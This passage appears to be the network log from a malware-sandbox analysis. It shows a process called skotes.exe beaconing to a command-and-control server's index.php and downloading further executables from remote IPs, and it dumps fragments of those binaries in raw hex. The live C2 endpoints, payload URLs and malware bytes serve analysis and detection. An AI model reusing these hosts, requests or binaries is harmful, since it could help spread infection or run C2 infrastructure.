                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.864981890 CET1236INData Raw: eb 05 90 83 45 d0 04 8b 45 d8 83 f8 10 72 32 8d 50 01 81 fa 00 10 00 00 72 19 90 8b 4d dc 8b 41 fc 83 c1 fc 29 c1 83 f9 20 73 4a 8b 55 d8 83 c2 24 eb 03 8b 45 dc 90 52 50 e8 e4 10 00 00 83 c4 08 90 8b 45 cc 40 3b 75 0c 0f 85 b4 fd ff ff 90 8b 45
                                                                                                                                                                                                                                                Data Ascii: EEr2PrMA) sJU$ERPE@;uEEMdH^_[]EOmfU]@U]@UM1]fff.U]@U]UWVeE
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.864998102 CET1236INData Raw: 41 00 e8 c8 f8 ff ff 83 c4 08 89 45 e8 8b 55 e8 ff d2 6a 1c 68 00 e0 41 00 68 49 05 00 00 68 1c e0 41 00 e8 97 fc ff ff 83 c4 10 6a 09 68 00 60 41 00 57 56 e8 86 fc ff ff 83 c4 10 68 01 dc af 8a ff 35 58 f0 41 00 e8 83 f8 ff ff 83 c4 08 8d 4d ec
                                                                                                                                                                                                                                                Data Ascii: AEUjhAhIhAjh`AWVh5XAMQj@hIhAuM11^_]uuVA'jhAUSWVL]eEEE"@dMdd=0w@XAhb-/5XA
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.865012884 CET448INData Raw: c5 0c 83 c4 1c 5d c3 cc cc cc cc 8b 44 24 08 83 f8 0f 74 0d 83 f8 02 75 0d 6a 00 ff 15 8c cd 41 00 31 c0 c2 10 00 ff 25 84 cd 41 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 58 90 89 65 e4 c7 45 f0 ff ff ff ff 8d 45 e8
                                                                                                                                                                                                                                                Data Ascii: ]D$tujA1%AUSWVXeEEE"@dMdjEWEEEE@EjAEE`AEPAft(WEEjjjEPAuugEd
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.865190983 CET1236INData Raw: 68 d0 20 40 00 6a 00 6a 00 e8 cc 51 00 00 83 c4 18 90 8b 4d e0 89 01 85 c0 0f 84 fd 00 00 00 90 c7 45 d8 00 00 00 00 90 8b 45 d4 8b 30 85 f6 0f 84 fb 00 00 00 e8 65 10 00 00 39 c6 0f 84 fd 00 00 00 90 6a 00 8b 75 e0 ff 76 04 ff 36 e8 fe 0f 00 00
                                                                                                                                                                                                                                                Data Ascii: h @jjQMEE0e9juv6FuAEj@@EMEQjPh"@jj-QEEu9juue
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.865202904 CET1236INData Raw: e8 dc 00 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc b8 28 d4 41 00 e9 9d 1f 00 00 cc cc cc cc cc cc b8 a8 d4 41 00 e9 8d 1f 00 00 cc cc cc cc cc cc b8 08 d5 41 00 e9 7d 1f 00 00 cc cc cc cc cc cc b8 64 d5 41 00 e9 6d 1f 00 00 cc
                                                                                                                                                                                                                                                Data Ascii: ](AAA}dAmA]tAMA=A-<AhAUugQYtuaYt]}gaUuY]
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.865230083 CET448INData Raw: 0c 56 e8 0b fc ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 14 56 8b 75 08 ff 34 b5 7c 61 41 00 e8 1f 00 00 00 50 ff 34 b5 98 61 41 00 8d 4d ec e8 02 02 00 00 68 2c d7 41 00 8d 45 ec 50 e8 8d 17 00 00 cc b8 44 e6 41 00 c3 55 8b ec 8b 45 08 8b
                                                                                                                                                                                                                                                Data Ascii: VYY^]UVu4|aAP4aAMh,AEPDAUEUH]UQQVWuupEPAPTYY_^UAVuV;Bu;Eu2^]UQVWy1urAE_^UUVuBN@;Au
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.865267992 CET1236INData Raw: 08 8b c6 8b 55 0c 89 4e 0c 8b 4d fc c7 06 c4 61 41 00 33 cd 89 56 10 5e e8 74 fa ff ff c9 c2 0c 00 55 8b ec 56 8b 75 08 57 56 8b f9 e8 a3 fa ff ff c7 07 c4 61 41 00 8b 46 0c 8b 56 10 89 47 0c 8b c7 89 57 10 5f 5e 5d c2 04 00 55 8b ec 56 8b f1 8d
                                                                                                                                                                                                                                                Data Ascii: UNMaA3V^tUVuWVaAFVGW_^]UVFD`APEYtjVYY^]j [AuEMPueEPuuMaAUVuNaA^],AUQuY
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.985043049 CET1236INData Raw: 2c ff ff ff 7f 75 0a c7 41 2c fe ff ff 7f 32 c0 c3 b0 01 c3 55 8b ec 51 56 6a 00 6a ff ff 75 08 ff 15 6c cd 41 00 83 f8 ff 74 32 8b 75 10 85 f6 74 16 8d 45 fc 50 ff 75 08 ff 15 b4 cc 41 00 85 c0 74 1a 8b 45 fc 89 06 ff 75 08 ff 15 48 cc 41 00 f7
                                                                                                                                                                                                                                                Data Ascii: ,uA,2UQVjjulAt2utEPuAtEuHAjX^%AUMhAEPU$jAtjY)AAAA5A=AfAfAfAfAf%Af-AA


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.449961185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:21.260241985 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014797001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:22.486620903 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.44996631.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:22.922314882 CET66OUTGET /files/7850253564/4ZD5C3i.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150744915 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:23 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 1177600
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 12:51:39 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c2ddb-11f800"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1d 5f 48 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 0e 1d 00 fa 0b 00 00 fa 05 00 00 00 00 00 a1 21 01 00 00 10 00 00 00 d0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 12 00 00 04 00 00 c5 23 12 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c b5 10 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 90 a4 00 00 4c ab 10 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 ab 10 00 40 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_Hg!@`#@<TL8@t.text `.rdata*@@.data@.relocR@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150836945 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 10 83 65 fc 00 53 56 8b d9 8b f2 57 8b 3d 50 12 4c 00 56 83
                                                                                                                                                                                                                                                Data Ascii: UeSVW=PLV#u]t]@CVuu]]MKtXeV?}KUtGP4jVjj<LUGBUVPLuM!<3_^[V
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150855064 CET448INData Raw: 01 0f 85 5a fe ff ff 8b 4d b0 89 51 10 8b 55 fc 89 11 8b 55 f4 89 51 20 8b 55 f0 89 51 04 8b 55 e8 89 51 18 8b 55 e4 89 79 30 8b 7d ec 89 41 38 8b 45 e0 89 51 08 8b 55 dc 89 79 24 89 41 28 8b 45 f8 5f 89 51 1c 8b 55 d8 89 71 34 89 41 0c 8b 45 d4
                                                                                                                                                                                                                                                Data Ascii: ZMQUUQ UQUQUy0}A8EQUy$A(E_QUq4AE^YQ<3A,[DxB|uUVWhZGu&YY3OdwpwtG@@_^]USVW39}v'F@@rf@300F@G
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150866032 CET1236INData Raw: c1 83 e1 0f c1 e8 04 47 66 8b 44 45 dc 66 89 04 56 8d 52 02 66 8b 44 4d dc 66 89 44 56 fe 83 ff 09 7c d8 33 c0 5f 66 89 04 56 5e 5b c9 c3 55 8b ec 81 ec 94 00 00 00 53 56 57 68 88 94 51 00 ff 15 20 12 4c 00 c6 45 c8 6d 33 db c6 45 c9 09 c6 45 ca
                                                                                                                                                                                                                                                Data Ascii: GfDEfVRfDMfDV|3_fV^[USVWhQ LEm3EEnEEoEEjEE~EEuEE}EE7EE}EEvEEyEE]El@rEujLWVS$Ltf<F\t3fFu
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150892019 CET1236INData Raw: 24 5c e9 79 06 00 00 68 60 02 00 00 8d 8c 24 6c 02 00 00 e8 3e 41 00 00 83 c4 04 8d 8c 24 8c 01 00 00 6a 1e e8 2d 41 00 00 83 c4 04 8d 8c 24 84 00 00 00 6a 16 e8 1c 41 00 00 83 c4 04 8d 8c 24 cc 00 00 00 6a 14 58 50 e8 09 41 00 00 83 c4 04 8d 8c
                                                                                                                                                                                                                                                Data Ascii: $\yh`$l>A$j-A$jA$jXPA$j8@T$(3;|(L$ v!PD$Pj$PS0LT$$3L$ $PKun;|jbvcjPjjSL3PD$Pj8$PS0L3PD$PjYQ$PS0L3
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.150903940 CET1236INData Raw: 8b 44 24 1c 8b 54 24 18 89 44 24 38 89 54 24 60 3b 44 24 74 0f 8f 5f 01 00 00 7c 0a 3b 54 24 50 0f 83 53 01 00 00 8b c2 0b 44 24 38 74 3c 03 54 24 6c 8b 44 24 70 13 44 24 38 8b 4c 24 74 89 54 24 60 89 44 24 38 3b c1 7c 24 7f 06 3b 54 24 50 72 1c
                                                                                                                                                                                                                                                Data Ascii: D$T$D$8T$`;D$t_|;T$PSD$8t<T$lD$pD$8L$tT$`D$8;|$;T$PrT$PjYT$`D$8D$83WfD$@;u;t=L$DL$L$@\$X9\$xu\$X9D\$xT$;u9t$u3RRPQSLt$<3PD$Ph6S0Lt$
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.151021957 CET672INData Raw: 66 89 84 24 84 00 00 00 58 6a 00 5b 66 89 84 24 82 00 00 00 8b 44 24 24 13 c3 89 8c 24 18 01 00 00 89 84 24 1c 01 00 00 89 84 24 24 01 00 00 0f b7 c2 89 8c 24 20 01 00 00 33 c9 99 8b da 8b 54 24 18 03 d0 6a 00 13 cb 03 54 24 24 13 4c 24 28 81 c2
                                                                                                                                                                                                                                                Data Ascii: f$Xj[f$D$$$$$$$ 3T$jT$$L$(T$tZj?L$\Yf$,jY3$Jj?Zj$J$$R$`$VYjf$^3$ZPK|$tt$\Yf$t3$vf$z$|L$$
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.151034117 CET1236INData Raw: ff d7 33 c0 50 8d 44 24 14 50 6a 1e 8d 84 24 b6 01 00 00 50 53 ff d7 8b 4c 24 7c 33 c0 50 8d 44 24 14 50 0f b7 c1 50 ff 76 08 53 ff d7 33 c0 50 8d 44 24 14 50 6a 04 8d 84 24 8c 00 00 00 50 53 ff d7 33 c0 50 8d 44 24 14 50 6a 10 8d 84 24 24 01 00
                                                                                                                                                                                                                                                Data Ascii: 3PD$Pj$PSL$|3PD$PPvS3PD$Pj$PS3PD$Pj$$PSjXPW3PfD$ t$$t$$SL3PD$Pt$6S3;L$$|D$ 9$v$QD$Ph`$tPS3PD$Pj.$4PS3PD$P5@Qh@QS3PD$Pj.$
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.151043892 CET1236INData Raw: 8b c8 8b f2 8b 43 08 f7 6f 38 03 c8 8b 43 18 13 f2 f7 6f 28 03 c8 8b 43 28 13 f2 f7 6f 18 03 c8 8b 43 10 13 f2 f7 6f 30 0f a4 ce 01 03 c9 03 c8 8b 43 20 13 f2 f7 6f 20 03 c8 8b 03 13 f2 f7 6f 40 03 c8 8b 43 30 13 f2 f7 6f 10 03 c8 8b 43 40 13 f2
                                                                                                                                                                                                                                                Data Ascii: Co8Co(C(oCo0C o o@C0oC@/EH@pDC o(C@ooHCH/Co@C0oCo0C8oCo8C(o EHHpLCo8C8oCHoC(o(
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.151056051 CET448INData Raw: 00 56 ff 75 08 8b f1 8d 8d 64 ff ff ff e8 5b f9 ff ff 59 8d 8d 64 ff ff ff e8 1d fe ff ff 8d 8d 64 ff ff ff e8 dc fe ff ff 6a 50 8d 95 64 ff ff ff 8b ce e8 4f 2b 00 00 59 5e c9 c3 55 8b ec 83 ec 20 53 56 57 8b fa 89 4d fc 8b 07 f7 e8 8b 5f 08 89
                                                                                                                                                                                                                                                Data Ascii: Vud[YddjPdO+Y^U SVWM_QQAOMEpHOMoEpHG Eoo GEH O(p$M
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:24.270733118 CET1236INData Raw: 20 13 f2 f7 e8 0f a4 ce 01 03 c9 03 c8 8b 45 fc 13 f2 89 48 40 89 70 44 8b 07 f7 eb 8b c8 8b f2 8b 47 08 f7 6f 40 03 c8 8b 47 10 13 f2 f7 6f 38 03 c8 8b 47 18 13 f2 f7 6f 30 03 c8 8b 47 20 13 f2 f7 6f 28 03 c8 8b 45 fc 13 f2 0f a4 ce 01 89 70 4c
                                                                                                                                                                                                                                                Data Ascii: EH@pDGo@Go8Go0G o(EpLHHGGo8G@EmEEpTHPEEEmEmEp\HXEEmE


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.449983185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:29.489383936 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014798001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:30.915210962 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.450248185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:32.791301966 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:34.128856897 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.450258185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:35.790566921 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:37.134685993 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.450259185.215.113.16807356C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:37.177474976 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494636059 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:37 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 3223040
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 12:25:38 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c27c2-312e00"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 30 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf01@`12@WkH<11 @.rsrcH@.idata @utqttalqp*p*@cjsrlafd 11@.taggant001"1@
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494693995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494771957 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494808912 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494847059 CET1236INData Raw: 66 dd fd 02 6d 6e d5 48 b6 42 18 61 b5 5a 1a 73 fd 9e c2 da 23 1d c2 02 8d 1d 77 be fa c4 b6 5a c6 de fd 02 6d 8e d8 48 b6 42 f8 60 b5 5a 1a d3 fd 9e c2 da 03 1d c2 02 8d 1d 77 be fa c4 be 5a d6 de fd 02 6d 3e da 48 b6 42 d8 60 b5 5a 1a 33 fc 9e
                                                                                                                                                                                                                                                Data Ascii: fmnHBaZs#wZmHB`ZwZm>HB`Z3cwZmHB`ZCwZrmHB_ZwZ2mHBx_ZSwZBmjHBX_Zw[^m~HB8_Z
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494882107 CET1236INData Raw: e3 19 c2 02 8d 1d 77 be fa c4 be 5a 7a e0 fd 02 6d 86 d5 48 b6 42 38 5b b5 5a 1a 13 0e 9e c2 da c3 19 c2 02 8d 1d 77 be fa c4 be 5a 82 e0 fd 02 6d 0a ee 48 b6 42 18 5c b5 5a 1a 73 0e 9e c2 da 23 18 c2 02 8d 1d 77 be fa c4 ba 5a 8a e0 fd 02 6d 0e
                                                                                                                                                                                                                                                Data Ascii: wZzmHB8[ZwZmHB\Zs#wZmHB[ZwZm~HB[Z3cwZm6HB[ZCwZmNHBZZwZ>mHBxZZSwZFm
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494919062 CET1236INData Raw: b6 42 78 66 b5 5a 1a 53 10 9e c2 da 83 14 c2 02 8d 1d 77 be fa c4 02 5b e6 e3 fd 02 6d 56 da 48 b6 42 58 66 b5 5a 1a b3 10 9e c2 da e3 14 c2 02 8d 1d 77 be fa c4 12 5b ae e3 fd 02 6d 3a ee 48 b6 42 38 66 b5 5a 1a 13 0f 9e c2 da c3 14 c2 02 8d 1d
                                                                                                                                                                                                                                                Data Ascii: BxfZSw[mVHBXfZw[m:HB8fZwZmHBgZs#wZmHBfZwZmHBfZ3cw[mHBfZCw[6mHBeZw
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.494956970 CET1236INData Raw: fa c4 c4 5a 62 df 00 03 1e 19 5e 03 b6 c2 62 d8 72 5a 9a 4a 61 5b c2 85 f2 66 83 be fa 26 77 be fa c4 b6 da 2b 0c c2 02 9e 0a b1 46 b6 e3 c2 7b 76 5e 63 a2 31 a0 c2 da 83 0f c2 02 33 1e bb c5 fa c2 12 da 72 5a 9a 46 61 5b c2 2b f3 26 77 be fa c2
                                                                                                                                                                                                                                                Data Ascii: Zb^brZJa[f&w+F{v^c13rZFa[+&wrZa[+6pZ#J[~`rZ`[+Z]trZa[fZhQPo]rZb[+7pZQ[ZR$oZRo\B^Z.BZc.IR
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.495007038 CET1236INData Raw: ce 6d c3 02 3b a7 a6 85 f2 62 7f 08 36 60 fd 02 3b 20 f4 bf 88 42 ff 9c b5 5a 3b e7 89 1c bf 02 fa 26 77 be fa 26 77 be fa 26 77 be fa af 3b de 80 e5 b1 01 7f 1a 36 48 b2 aa 7f 08 42 5f fd 02 90 69 90 02 3b 9f ba 85 f6 5e 12 db fa 6c c3 02 33 1e
                                                                                                                                                                                                                                                Data Ascii: m;b6`; BZ;&w&w&w;6HB_i;^l3G0&w&w&w;;{<}&w&w&w;;}f9</b&w&w&w;;[57.Y.Y:}~^;8W;~&w;;
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:38.495043993 CET1236INData Raw: fa 26 77 be fa 26 77 be fa af 3b de 85 e5 fd fe 7f e5 2d fb 7e aa 39 57 2a 42 fa 6a b5 5a 3b b2 ef a0 d2 02 b6 5a c2 7d fc 21 01 f7 b6 5a c2 02 33 1e bf c8 b0 5a 35 4b b5 e4 c1 43 32 1a 2e cc db 29 12 35 3b 28 9b 00 80 5b c2 31 3b 20 09 7e 11 b7
